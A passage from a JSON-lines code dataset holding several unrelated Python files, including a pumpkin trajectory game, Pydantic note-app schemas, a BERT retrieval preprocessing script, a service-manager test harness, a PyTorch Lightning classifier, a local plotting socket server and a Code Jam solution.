Y_TARGET):\n fig,ax = plt.subplots()\n ax.plot(X_LIST_1, Y_LIST_1, color=\"green\", label=TAG_1)\n ax.plot(X_LIST_2, Y_LIST_2, color=\"red\", label=TAG_2)\n ax.legend()\n ax.grid()\n plt.title(\"Punkin Chunkin Trajectory\")\n plt.xlabel(\"Distance\")\n plt.ylabel(\"Height\")\n index_1=len(X_LIST_1)-1\n index_2=len(X_LIST_2)-1\n ax.add_artist(plt.Circle(((X_LIST_1[index_1],Y_LIST_2[index_1])), 15, color='orange'))\n ax.add_artist(plt.Circle(((X_LIST_2[index_2],Y_LIST_2[index_2])), 15, color='red'))\n plt.show()\n return fig,ax \n\n#------------------------------------------------------\n# Problem 12 & Problem 14\n#------------------------------------------------------\n# Add your play_punkin_chunkin function here\n# The function play_punkin_chunkin explains the game to the user\n# then asks if the user would like to use two practice shots\n# if the player answers yes they are able to try to hit the target two times\n# before ther actal attempt. If the user enters no they must do their actaual attempt\n# If the user hits the target a message will be displayed telling them so and if they miss\n# a message will be displayed telling them\ndef play_punkin_chunkin():\n print(\"Hello and welcome to the game Punkin Chunkin! \\nThe objective of this game is to launch a pumpkin and hit a target.\\nYou will need to enter in the angle and velocity at which you launch the pumpkin.\\n\")\n TARGET_X, TARGET_Y = set_up_target()\n print(\"You will get two trials turns\\nWould you like to practice?\")\n if get_yes_or_no(\"Would you like to practice before you begin?\") ==\"yes\":\n \n print(\"\\nThis is trial number 1\")\n PUMPKIN_X ,PUMPKIN_Y,angle,velocity = set_up_pumpkin()\n X_LIST_1, Y_LIST_1 = compute_trajectory(TARGET_X,TARGET_Y,PUMPKIN_X,PUMPKIN_Y,angle,velocity)\n TAG_1 = \"Pumpkin Trial 1\"\n \n print(\"\\nThis is trial number 2\")\n PUMPKIN_X ,PUMPKIN_Y,angle,velocity = set_up_pumpkin()\n X_LIST_2, Y_LIST_2 = compute_trajectory(TARGET_X,TARGET_Y,PUMPKIN_X,PUMPKIN_Y,angle,velocity)\n TAG_2 = \"Pumpkin Trial 2\"\n \n plot_trajectory(X_LIST_1, Y_LIST_1, TAG_1, X_LIST_2, Y_LIST_2, TAG_2, TARGET_X, TARGET_Y)\n \n \n PUMPKIN_X ,PUMPKIN_Y,angle,velocity = set_up_pumpkin()\n x_val_list, y_val_list = compute_trajectory(TARGET_X,TARGET_Y,PUMPKIN_X,PUMPKIN_Y,angle,velocity)\n pumpkin_display.display_chunk(x_val_list, y_val_list, angle, TARGET_X, TARGET_Y)\n \n \nif __name__ == \"__main__\":\n play_punkin_chunkin()\n\n\n","repo_name":"calumsudo/PunkinChunkin","sub_path":"punkin_chunkin.py","file_name":"punkin_chunkin.py","file_ext":"py","file_size_in_byte":14599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72659533313","text":"from __future__ import annotations\n\nimport datetime\nfrom typing import Optional\n\nfrom pydantic import BaseModel, Field, EmailStr\n\nfrom .static.enums import NoteTypeEnumDB, NotesCompletedEnum, \\\n\tNotesOrderByEnum, NotesPeriodEnum, NoteTypeEnum\n\n\nclass Token(BaseModel):\n\taccess_token: str\n\ttoken_type: str\n\n\nclass TokenData(BaseModel):\n\temail: Optional[str] = None\n\n\nclass NoteBase(BaseModel):\n\tnote_type: Optional[NoteTypeEnumDB] = Field(\n\t\ttitle=\"Note type - note/task\",\n\t\texample=\"task\",\n\t\tdefault=NoteTypeEnumDB.note.value\n\t)\n\ttext: str = Field(\n\t\tmax_length=1000,\n\t\ttitle=\"Note/task content field\",\n\t\texample=\"Needs for walking today\"\n\t)\n\tdate: Optional[datetime.date] = Field(\n\t\ttitle=\"Note/task date\",\n\t\tdescription=\"Current date by default\",\n\t\tdefault_factory=datetime.date.today\n\t)\n\tcreated_at: Optional[datetime.datetime] = Field(\n\t\ttitle=\"Note creating datetime\",\n\t\tdescription=\"Current date/time by default\",\n\t\tdefault_factory=datetime.datetime.now\n\t)\n\tuser_id: Optional[int] = Field(ge=1)\n\n\nclass NoteCreate(NoteBase):\n\t\"\"\"\n\tИД пользователя определяется в момент создания заметки (после проверки токена)\n\t\"\"\"\n\tpass\n\n\nclass Note(NoteBase):\n\tid: int = Field(ge=1)\n\tcompleted: Optional[bool] = Field(\n\t\ttitle=\"Is task completed?\",\n\t\tdescription=\"Note could be completed if its type is task.\\n\"\n\t\t\t\t\t\"If note type is standard note, this field is null.\"\n\t)\n\n\tclass Config:\n\t\torm_mode = True\n\n\nclass NoteUpdate(BaseModel):\n\tnote_type: Optional[NoteTypeEnumDB] = Field(\n\t\ttitle=\"Note type - note/task\",\n\t\texample=NoteTypeEnumDB.task.value,\n\t\tdefault=None\n\t)\n\ttext: Optional[str] = Field(\n\t\tmax_length=1000,\n\t\ttitle=\"Note/task content field\",\n\t\texample=\"Needs for walking today\",\n\t\tdefault=None\n\t)\n\tdate: Optional[datetime.date] = Field(\n\t\ttitle=\"Note/task date\",\n\t\tdefault=None\n\t)\n\tcompleted: Optional[bool] = None\n\n\nclass UserBase(BaseModel):\n\temail: EmailStr = Field(\n\t\ttitle=\"User's email\",\n\t\texample=\"ijoech@gmail.com\"\n\t)\n\tfirst_name: str = Field(\n\t\tmax_length=50,\n\t\ttitle=\"User first name, required\",\n\t\texample=\"Yaroslav\"\n\t)\n\tlast_name: Optional[str] = Field(\n\t\tmax_length=50,\n\t\ttitle=\"User last name, optional\",\n\t\texample=\"Ivanov\",\n\t\tdefault=None\n\t)\n\tregistered_at: Optional[datetime.datetime] = Field(\n\t\tdefault_factory=datetime.datetime.now\n\t)\n\n\nclass UserCreate(UserBase):\n\tpassword: str = Field(min_length=8)\n\n\nclass User(UserBase):\n\tid: int = Field(ge=1)\n\tis_staff: Optional[bool] = Field(\n\t\ttitle=\"True if user has staff-permissions\",\n\t\tdefault=False\n\t)\n\tdisabled: Optional[bool] = Field(\n\t\ttitle=\"False if user is active and non-blocked\",\n\t\tdefault=False\n\t)\n\n\tclass Config:\n\t\torm_mode = True\n\n\nclass UserInDB(User):\n\thashed_password: str\n\n\nclass UserUpdate(BaseModel):\n\temail: Optional[EmailStr] = Field(\n\t\ttitle=\"User's email\",\n\t\texample=\"ijoech@gmail.com\",\n\t\tdefault=None\n\t)\n\tfirst_name: Optional[str] = Field(\n\t\tmax_length=50,\n\t\ttitle=\"User first name, required\",\n\t\texample=\"Yaroslav\",\n\t\tdefault=None\n\t)\n\tlast_name: Optional[str] = Field(\n\t\tmax_length=50,\n\t\ttitle=\"User last name, optional\",\n\t\texample=\"Ivanov\",\n\t\tdefault=None\n\t)\n\tpassword: Optional[str] = Field(\n\t\tmin_length=8,\n\t\tdefault=None\n\t)\n\tdisabled: Optional[bool] = Field(\n\t\tdescription=\"False if user is active and non-blocked\",\n\t\tdefault=False\n\t)\n\n\nclass GetNotesParams(BaseModel):\n\tsorting: NotesOrderByEnum | None = NotesOrderByEnum.date_asc\n\tperiod: NotesPeriodEnum | None = NotesPeriodEnum.upcoming\n\ttype: NoteTypeEnum | None = NoteTypeEnum.all\n\tcompleted: NotesCompletedEnum | None = NotesCompletedEnum.all\n\n\nclass DayRatingBase(BaseModel):\n\tuser_id: Optional[int] = Field(ge=1)\n\tnotes: Optional[bool] = Field(\n\t\tdescription=\"Rating for tasks of the day (done or not, etc.)\",\n\t\tdefault=None\n\t)\n\tmood: Optional[bool] = Field(\n\t\tdescription=\"Rating for mood of the day\",\n\t\tdefault=None\n\t)\n\thealth: Optional[bool] = Field(\n\t\tdescription=\"Rating for health feeling of the day\",\n\t\tdefault=None\n\t)\n\tnext_day_expectations: Optional[bool] = Field(\n\t\tdescription=\"Positive or negative expectations from the next day\",\n\t\tdefault=None\n\t)\n\n\nclass DayRatingCreate(DayRatingBase):\n\tpass\n\n\nclass DayRating(DayRatingBase):\n\tdate: datetime.date = Field(\n\t\tdescription=\"Date that was rated by user\"\n\t)\n\n\nclass DayRatingUpdate(DayRatingBase):\n\tpass\n","repo_name":"Dahaka1/eztask","sub_path":"app/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42127015529","text":"import pandas as pd\nimport torch\nimport torch.nn as nn\nfrom tqdm import tqdm\nimport argparse\n\nfrom datetime import datetime,timezone,timedelta\ndef timestamp(msg=\"\"):\n dt1 = datetime.utcnow().replace(tzinfo=timezone.utc)\n dt2 = dt1.astimezone(timezone(timedelta(hours=8))) # 轉換時區 -> 東八區\n print(str(dt2)[:-13] + '\\t' + msg)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-LM\",default=\"bert-base-uncased\", type=str)\nparser.add_argument(\"-bert_data_path\", type=str, required=True) # \"./dataset/1+3_bert_data.pt\"\nparser.add_argument(\"-mode\", type=str, choices=[\"train\", \"test\"], required=True)\nargs = parser.parse_args()\n\ndoc_df = pd.read_csv(\"./dataset/documents.csv\")\ndoc_df = doc_df.set_index('doc_id')\ndoc_df = doc_df.fillna(\"\")\ndoc_dict = doc_df.to_dict()['doc_text']\ntrain_q_df = pd.read_csv(\"./dataset/train_queries.csv\")\ntest_q_df = pd.read_csv(\"./dataset/test_queries.csv\")\n\nimport random\nfrom transformers import BertTokenizer\ntokenizer = BertTokenizer.from_pretrained(args.LM)\n\ndef df_2_bert(mode, df, document_dict):\n assert mode in [\"train\", \"test\", \"dev\"]\n bert_data = []\n q_id_list = df['query_id']\n q_list = df['query_text']\n if mode == \"train\":\n pos_doc_ids_list = df['pos_doc_ids']\n bm25_top1000_list = df['bm25_top1000']\n all_used_doc = []\n for doc_list in bm25_top1000_list:\n all_used_doc += [doc for doc in doc_list.split()]\n\n for idx in range(len(q_id_list)):\n pos_doc_ids = pos_doc_ids_list[idx].split()\n for doc_list in pos_doc_ids:\n all_used_doc += [doc_list]\n all_used_doc = list(set(all_used_doc))\n doc_dict = {key: document_dict[key] for key in all_used_doc} \n print(len(doc_dict))\n\n for idx, q_id in tqdm(enumerate(q_id_list)):\n query = q_list[idx]\n if mode == \"train\":\n # 1 positive, 3 negative\n neg_doc = list(set(bm25_top1000_list[idx].split()) - set(pos_doc_ids_list[idx].split()))\n \n for r_doc in pos_doc_ids_list[idx].split():\n batch_q = [query]*4\n batch_doc = [doc_dict[r_doc]]\n\n sampled_neg_doc = random.sample(neg_doc, 3) # 3 negative\n for nr_doc in sampled_neg_doc:\n batch_doc += [doc_dict[nr_doc]]\n bert_dict = tokenizer(batch_q, batch_doc,\n max_length=512,\n padding='max_length',\n return_token_type_ids=True,\n truncation=True) # dict of tensor {ids:[]...}\n bert_dict['q_id'] = [q_id]*4\n bert_dict['doc_id'] = [r_doc] + sampled_neg_doc\n bert_dict['label'] = [1] + [0]*3\n bert_data += [bert_dict]\n\n elif mode == \"test\":\n for doc in bm25_top1000_list[idx].split():\n bert_dict = tokenizer(query, doc_dict[doc],\n max_length=512,\n padding='max_length',\n return_token_type_ids=True,\n truncation=True) # dict of tensor {ids:[]...}\n bert_dict['q_id'] = q_id\n bert_dict['doc_id'] = doc\n bert_data += [bert_dict]\n \n return bert_data # List[Dict[List]] = List[tokenizer output]\n\ntrain_bert_data = df_2_bert(args.mode, train_q_df, doc_dict)\ntorch.save(train_bert_data, args.bert_data_path)","repo_name":"DannyLeee/transformer-based-IR-system","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15796203514","text":"import logging\nimport os\nimport subprocess\nimport tempfile\nimport time\n\nimport object_database\nfrom object_database.util import genToken\nfrom object_database.service_manager.ServiceManager import ServiceManager\n\nfrom object_database import core_schema, connect, service_schema\nfrom object_database.frontends import service_manager\n\nownDir = os.path.dirname(os.path.abspath(__file__))\n\nVERBOSE = True\n# Turn VERBOSE off on TravisCI because subprocess.PIPE seems to lock things up\nVERBOSE = False if os.environ.get(\"TRAVIS_CI\", None) else VERBOSE\n\n\nclass ServiceManagerTestCommon(object):\n # set to False if you want your test harness to dump logs of individual services\n # directly into the test harness. This can be very verbose if you have lots of\n # services, and make it hard to see the test output, so its off by default.\n LOGS_IN_FILES = True\n\n ENVIRONMENT_WAIT_MULTIPLIER = 5 if os.environ.get(\"TRAVIS_CI\", None) is not None else 1\n\n # set to an integer to test running the services over a proxy port.\n PROXY_SERVER_PORT = None\n ODB_PORT = 8023\n\n def schemasToSubscribeTo(self):\n \"\"\"Subclasses can override to extend the schema set.\"\"\"\n return []\n\n def waitRunning(self, serviceName):\n self.assertTrue(\n ServiceManager.waitRunning(\n self.database, serviceName, 5.0 * self.ENVIRONMENT_WAIT_MULTIPLIER\n ),\n \"Service \" + serviceName + \" never came up.\",\n )\n\n def timeElapsed(self):\n return time.time() - self.test_start_time\n\n def setUp(self):\n self.logger = logging.getLogger(__name__)\n self.test_start_time = time.time()\n self.token = genToken()\n self.tempDirObj = tempfile.TemporaryDirectory()\n self.tempDirectoryName = self.tempDirObj.name\n object_database.service_manager.Codebase.setCodebaseInstantiationDirectory(\n self.tempDirectoryName, forceReset=True\n )\n\n os.makedirs(os.path.join(self.tempDirectoryName, \"source\"))\n os.makedirs(os.path.join(self.tempDirectoryName, \"storage\"))\n os.makedirs(os.path.join(self.tempDirectoryName, \"logs\"))\n\n self.logDir = os.path.join(self.tempDirectoryName, \"logs\")\n\n logLevelName = logging.getLevelName(logging.getLogger(__name__).getEffectiveLevel())\n\n self.server = service_manager.startServiceManagerProcess(\n self.tempDirectoryName,\n self.ODB_PORT,\n self.token,\n loglevelName=logLevelName,\n sslPath=os.path.join(ownDir, \"..\", \"..\", \"testcert.cert\"),\n verbose=VERBOSE,\n proxyPort=self.PROXY_SERVER_PORT,\n logDir=self.LOGS_IN_FILES,\n )\n\n try:\n self.database = connect(\n \"localhost\", self.PROXY_SERVER_PORT or self.ODB_PORT, self.token, retry=True\n )\n self.database.subscribeToSchema(\n core_schema, service_schema, *self.schemasToSubscribeTo()\n )\n except Exception:\n self.logger.error(\"Failed to initialize for test\")\n self.server.terminate()\n self.server.wait()\n self.tempDirObj.cleanup()\n raise\n\n def newDbConnection(self):\n return connect(\n \"localhost\", self.PROXY_SERVER_PORT or self.ODB_PORT, self.token, retry=True\n )\n\n def tearDown(self):\n self.server.terminate()\n try:\n self.server.wait(timeout=15.0)\n except subprocess.TimeoutExpired:\n self.logger.warning(\n \"Failed to gracefully terminate service manager. Sending KILL signal\"\n )\n self.server.kill()\n try:\n self.server.wait(timeout=5.0)\n except subprocess.TimeoutExpired:\n self.logger.error(\"Failed to kill service manager process.\")\n\n try:\n self.tempDirObj.cleanup()\n except Exception:\n # race conditions can cause problems here\n try:\n time.sleep(1.0)\n self.tempDirObj.cleanup()\n except Exception:\n pass\n","repo_name":"APrioriInvestments/object_database","sub_path":"object_database/service_manager/ServiceManagerTestCommon.py","file_name":"ServiceManagerTestCommon.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"33518507179","text":"from typing import Any, List\nimport torch\nimport torch.nn as nn\nimport timm\nfrom pytorch_lightning import LightningModule, Trainer\nfrom torchmetrics import MaxMetric, ConfusionMatrix, F1Score, CohenKappa, Accuracy\nfrom src.utils import get_shuffled_label\nfrom src.utils import get_shuffled_label, get_confmat\nimport wandb, numpy as np\nfrom src.datamodules.colon_datamodule import ColonDataset, ColonDataModule\nimport pandas as pd\n\nimport albumentations as A\nfrom albumentations.core.composition import Compose, OneOf\nfrom albumentations.pytorch import ToTensorV2\nfrom torch.utils.data import DataLoader, Dataset\nimport cv2\n\ndata_cnt = 0\n\nclass ClassifyCompareLitModule(LightningModule):\n def __init__(\n self,\n lr: float = 1e-4,\n weight_decay: float = 0.0005,\n t_max: int = 20,\n min_lr: int = 1e-6,\n T_0=15,\n T_mult=2,\n key='None',\n threshold=0.1,\n eta_min=1e-6,\n name=\"vit_base_patch16_224\",\n pretrained=True,\n scheduler=\"CosineAnnealingLR\",\n factor=0.5,\n patience=5,\n eps=1e-08,\n loss_weight=0.5,\n module_type=\"classifycompare\",\n implementation_model=False,\n class_cnt=4,\n ):\n\n super().__init__()\n self.save_hyperparameters(logger=False)\n\n self.model = timm.create_model(\n self.hparams.name, pretrained=self.hparams.pretrained, num_classes=class_cnt)\n\n\n self.discriminator_layer1 = nn.Sequential(\n nn.Linear(self.model.classifier.in_features, 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, class_cnt),\n ) if 'net' in self.hparams.name else nn.Sequential(\n nn.Linear(self.model.head.in_features, 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, class_cnt),\n )\n self.discriminator_layer2 = nn.Sequential(\n nn.Linear(self.model.classifier.in_features*2, 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, 3),\n ) if 'net' in self.hparams.name else nn.Sequential(\n nn.Linear(self.model.head.in_features*2, 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, 3),\n )\n\n self.criterion = torch.nn.CrossEntropyLoss()\n self.train_acc = Accuracy()\n self.val_acc = Accuracy()\n self.test_acc = Accuracy()\n self.train_acc_compare = Accuracy()\n self.val_acc_compare = Accuracy()\n self.test_acc_compare = Accuracy()\n self.val_acc_best = MaxMetric()\n self.val_f1_best = MaxMetric()\n self.val_acc_compare_best = MaxMetric()\n self.confusion_matrix = ConfusionMatrix(num_classes=class_cnt)\n self.f1_score = F1Score(num_classes=class_cnt, average=\"macro\")\n self.cohen_kappa = CohenKappa(num_classes=class_cnt, weights=\"quadratic\")\n\n def forward(self, x): # 4 classification\n return self.discriminator_layer1(self.get_features(x.float()))\n\n def get_features(self, x):\n \"\"\"get features from timm models\n\n Since densenet code is quite different from vit models, the extract part is different\n \"\"\"\n features = self.model.global_pool(self.model.forward_features(x.float())) if 'densenet' in self.hparams.name else self.model.forward_features(x.float())\n features = features if 'densenet' in self.hparams.name else self.model.forward_head(features, pre_logits=True)\n return features\n\n def get_comparison_list(self, origin, shuffle):\n \"\"\"\n get comparison answers from the pair of original and shuffled classes\n \"\"\"\n comparison = []\n for i, j in zip(origin.tolist(), shuffle.tolist()):\n if i > j: # >(origin)\n comparison.append(0)\n elif i == j:\n comparison.append(1)\n else:\n comparison.append(2)\n return torch.tensor(comparison, device=self.device)\n\n def get_memory_fifo_comparison_list(self, origin, shuffle):\n \"\"\"\n get comparison answers from the pair of original and shuffled classes\n \"\"\"\n result_compare = []\n for origin_value in origin.tolist():\n comparison = []\n for class_wise_value in shuffle:\n if origin_value > class_wise_value:\n comparison.append(0)\n elif origin_value == class_wise_value:\n comparison.append(1)\n else:\n comparison.append(2)\n result_compare.append(comparison)\n\n return torch.tensor(result_compare, device=self.device)\n\n def shuffle_batch(self, x, y):\n\n indices, shuffle_y = get_shuffled_label(x, y)\n comparison = self.get_comparison_list(y, shuffle_y)\n\n return indices, comparison, shuffle_y\n\n\n def step(self, batch):\n x, y = batch\n features = self.get_features(x)\n logits_4cls = self.discriminator_layer1(features)\n loss_4cls = self.criterion(logits_4cls, y)\n preds_4cls = torch.argmax(logits_4cls, dim=1)\n\n shuffle_indices, comparison, shuffle_y = self.shuffle_batch(x, y)\n shuffle_features = torch.stack([features[i] for i in shuffle_indices], dim=0)\n # size of shuffle_feature is [16, 768]\n\n concat_features = torch.cat((features, shuffle_features), dim=1)\n logits_compare = self.discriminator_layer2(concat_features)\n loss_compare = self.criterion(logits_compare, comparison)\n preds_compare = torch.argmax(logits_compare, dim=1)\n\n loss = loss_4cls + loss_compare * self.hparams.loss_weight\n\n return loss, preds_4cls, preds_compare, comparison, y, loss_compare, loss_compare * self.hparams.loss_weight\n\n def training_step(self, batch, batch_idx):\n\n loss, preds_4cls, preds_compare, comparison, target_4cls, loss_compare, weight_loss_compare = self.step(batch)\n acc = self.train_acc(preds=preds_4cls, target=target_4cls)\n acc_compare = self.train_acc_compare(preds=preds_compare, target=comparison)\n\n self.log(\"train/loss\", loss, on_step=True, on_epoch=True, prog_bar=False)\n self.log(\"train/loss_compare\", loss_compare, on_step=True, on_epoch=True, prog_bar=False)\n self.log(\"train/weight_loss_compare\", weight_loss_compare, on_step=True, on_epoch=True, prog_bar=False)\n self.log(\"train/acc\", acc, on_step=True, on_epoch=True, prog_bar=True)\n self.log(\"train/acc_compare\", acc_compare, on_step=True, on_epoch=True, prog_bar=True)\n self.log(\"LearningRate\", self.optimizer.param_groups[0][\"lr\"])\n\n return {\n \"loss\": loss,\n \"acc\": acc,\n \"preds\": preds_4cls,\n \"targets\": target_4cls,\n \"acc_compare\": acc_compare,\n \"preds_compare\": preds_compare,\n \"comparison\": comparison,\n }\n\n def training_epoch_end(self, outputs: List[Any]):\n # `outputs` is a list of dicts returned from `training_step()`\n sch = self.lr_schedulers()\n # If the selected scheduler is a ReduceLROnPlateau scheduler.\n if isinstance(sch, torch.optim.lr_scheduler.ReduceLROnPlateau):\n sch.step(self.trainer.callback_metrics[\"val/loss\"])\n\n def validation_step(self, batch, batch_idx):\n\n loss, preds_4cls, preds_compare, comparison, target_4cls, loss_compare, weight_loss_compare = self.step(batch)\n acc = self.val_acc(preds_4cls, target_4cls)\n f1 = self.f1_score(preds_4cls, target_4cls)\n acc_compare = self.val_acc_compare(preds=preds_compare, target=comparison)\n\n self.log(\"val/loss\", loss, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"val/loss_compare\", loss_compare, on_step=True, on_epoch=True, prog_bar=False)\n self.log(\"val/weight_loss_compare\", weight_loss_compare, on_step=True, on_epoch=True, prog_bar=False)\n self.log(\"val/acc\", acc, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"val/acc_compare\", acc_compare, on_step=False, on_epoch=True, prog_bar=True)\n self.log(\"val/f1\", f1, on_step=False, on_epoch=True, prog_bar=True)\n\n return {\n \"loss\": loss,\n \"acc\": acc,\n \"preds\": preds_4cls,\n \"targets\": target_4cls,\n \"acc_compare\": preds_compare,\n \"preds_compare\": preds_compare,\n \"comparison\": comparison,\n \"f1\": f1,\n }\n\n def validation_epoch_end(self, outputs):\n # called at the end of the validation epoch\n # outputs is an array with what you returned in validation_step for each batch\n # outputs = [{'loss': batch_0_loss}, {'loss': batch_1_loss}, ..., {'loss': batch_n_loss}]\n f1 = self.f1_score.compute()\n self.val_f1_best.update(f1)\n\n acc = self.val_acc.compute()\n self.val_acc_best.update(acc)\n\n\n self.log(\"val/acc_best\", self.val_acc_best.compute(), on_epoch=True, prog_bar=True)\n self.log(\"val/f1_best\", self.val_f1_best.compute(), on_epoch=True, prog_bar=True)\n\n acc_compare = self.val_acc_compare.compute()\n self.val_acc_compare_best.update(acc_compare)\n self.log(\n \"val/acc_compare_best\",\n self.val_acc_compare_best.compute(),\n on_epoch=True,\n prog_bar=True,\n )\n\n def test_step(self, batch, batch_idx):\n\n loss, preds_4cls, preds_compare, comparison, target_4cls, loss_compare, weight_loss_compare = self.step(batch)\n self.confusion_matrix(preds_4cls, target_4cls)\n self.f1_score(preds_4cls, target_4cls)\n self.cohen_kappa(preds_4cls, target_4cls)\n\n acc = self.test_acc(preds_4cls, target_4cls)\n acc_compare = self.test_acc_compare(preds_compare, comparison)\n self.log(\"test/loss\", loss, on_step=False, on_epoch=True)\n self.log(\"test/acc\", acc, on_step=False, on_epoch=True)\n self.log(\"test/acc_compare\", acc_compare, on_step=False, on_epoch=True)\n\n return {\n \"loss\": loss,\n \"acc\": acc,\n \"preds\": preds_4cls,\n \"targets\": target_4cls,\n \"acc_compare\": preds_compare,\n \"preds_compare\": preds_compare,\n \"comparison\": comparison,\n }\n\n def test_epoch_end(self, outputs):\n\n cm = self.confusion_matrix.compute()\n f1 = self.f1_score.compute()\n qwk = self.cohen_kappa.compute()\n p = get_confmat(cm)\n\n self.logger.experiment.log({\"test/conf_matrix\": wandb.Image(p)})\n self.log(\"test/f1_macro\", f1, on_step=False, on_epoch=True)\n self.log(\"test/wqKappa\", qwk, on_step=False, on_epoch=True)\n\n self.test_acc.reset()\n self.confusion_matrix.reset()\n self.f1_score.reset()\n self.cohen_kappa.reset()\n\n def on_epoch_end(self):\n self.train_acc.reset()\n self.val_acc.reset()\n self.test_acc.reset()\n self.train_acc_compare.reset()\n self.val_acc_compare.reset()\n self.test_acc_compare.reset()\n\n def configure_optimizers(self):\n self.optimizer = torch.optim.Adam(\n self.parameters(), lr=self.hparams.lr, weight_decay=self.hparams.weight_decay\n )\n self.scheduler = self.get_scheduler()\n if isinstance(self.scheduler, torch.optim.lr_scheduler.ReduceLROnPlateau):\n return {\n \"optimizer\": self.optimizer,\n \"lr_scheduler\": self.scheduler,\n \"monitor\": \"val/loss\",\n }\n\n return {\"optimizer\": self.optimizer, \"lr_scheduler\": self.scheduler}\n\n def get_scheduler(self):\n schedulers = {\n \"ReduceLROnPlateau\": torch.optim.lr_scheduler.ReduceLROnPlateau(\n self.optimizer,\n mode=\"min\",\n factor=self.hparams.factor,\n patience=self.hparams.patience,\n verbose=True,\n eps=self.hparams.eps,\n ),\n \"CosineAnnealingLR\": torch.optim.lr_scheduler.CosineAnnealingLR(\n self.optimizer, T_max=self.hparams.t_max, eta_min=self.hparams.min_lr, last_epoch=-1\n ),\n \"CosineAnnealingWarmRestarts\": torch.optim.lr_scheduler.CosineAnnealingWarmRestarts(\n self.optimizer,\n T_0=self.hparams.T_0,\n T_mult=1,\n eta_min=self.hparams.min_lr,\n last_epoch=-1,\n ),\n \"StepLR\": torch.optim.lr_scheduler.StepLR(self.optimizer, step_size=200, gamma=0.1),\n \"ExponentialLR\": torch.optim.lr_scheduler.ExponentialLR(self.optimizer, gamma=0.95),\n }\n if self.hparams.scheduler not in schedulers:\n raise ValueError(f\"Unknown scheduler: {self.hparams.scheduler}\")\n\n return schedulers.get(self.hparams.scheduler, schedulers[\"ReduceLROnPlateau\"])\n","repo_name":"Leejucheon96/ICCV_2023_CVAMD-Order-ViT-","sub_path":"src/models/classifycompare_module.py","file_name":"classifycompare_module.py","file_ext":"py","file_size_in_byte":13145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42416271351","text":"#Модуль socket для сетевого программирования\nfrom socket import *\nimport re\nimport matplotlib.pyplot as plt\n#данные сервера\nhost = 'localhost'\nport = 777\naddr = (host,port)\n\n#socket - функция создания сокета \n#первый параметр socket_family может быть AF_INET или AF_UNIX\n#второй параметр socket_type может быть SOCK_STREAM(для TCP) или SOCK_DGRAM(для UDP)\ntcp_socket = socket(AF_INET, SOCK_STREAM)\n#bind - связывает адрес и порт с сокетом\ntcp_socket.bind(addr)\n#listen - запускает прием TCP\ntcp_socket.listen(1)\n\n#Бесконечный цикл работы программы\nwhile True:\n \n #Если мы захотели выйти из программы\n question = input('Do you want to quit? y\\\\n: ')\n if question == 'y': break\n \n #print('wait connection...')\n \n #accept - принимает запрос и устанавливает соединение, (по умолчанию работает в блокирующем режиме)\n #устанавливает новый сокет соединения в переменную conn и адрес клиента в переменную addr\n conn, addr = tcp_socket.accept()\n print('client addr: ', addr)\n \n #recv - получает сообщение TCP\n data = conn.recv(1024)\n datax = bytes.decode(data)\n \n x = re.findall('(\\d+)', datax)\n a = x\n i=0\n print (x[1])\n while i<20:\n a[i]=int(x[i])\n print ('x ',a[i])\n \n i=i+1\n\n X=a[0:10]\n Y=a[10:20]\n print('x= ',X,'y= ',Y)\n fig = plt.figure() # Создание объекта Figure\n print (fig.axes) # Список текущих областей рисования пуст\n print (type(fig)) # тип объекта Figure\n plt.scatter(X, Y) \n plt.xlabel('X axes');\n plt.ylabel('Y axes');\n# После нанесения графического элемента в виде маркера\n# список текущих областей состоит из одной области\n print (fig.axes)\n\n# смотри преамбулу\n plt.savefig('example.png', fmt='png')\n data = open('example.png','rb+')\n #datan = png.encode(data)\n #plt.show()\n \n #если ничего не прислали, завершим программу\n if not data:\n print('EROR')\n conn.close()\n \n break\n else:\n #print('output: ',data)\n #send - передает сообщение TCP\n conn.sendfile(data)\n #close - закрывает сокет\n conn.close()\n data.close()\ntcp_socket.close()\n\n","repo_name":"LokiGoodJoker/client-server","sub_path":"serv.py","file_name":"serv.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23395039251","text":"from math import sqrt\n\nfp = open(\"C-small-attempt0.in\", \"r\")\npf = open(\"out.txt\", \"w\")\n\n\ndef isPalindrome(n):\n\tif n == n[::-1]:\n\t\treturn True\n\treturn False\n\ndef isSquare(n):\n\ts = sqrt(n)\n\tif s == int(s):\n\t\treturn True\n\treturn False\n\nt = int(fp.readline())\n\nfor j in range(0, t):\n\tl = fp.readline()\n\tp = l.split(' ')\n\n\tc = 0\n\t\n\tfor i in range(int(p[0]), int(p[1])+1):\n\t\ts = repr(i)\n\t\tif isPalindrome(s):\n\t\t\tif isSquare(i):\n\t\t\t\tq = repr(int(sqrt(i)))\n\t\t\t\tif isPalindrome(q):\n\t\t\t\t\tc += 1\n\t\n\tpf.write(\"Case #\" + str(j+1) + \": \" + str(c) + \"\\n\")\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/2545.py","file_name":"2545.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 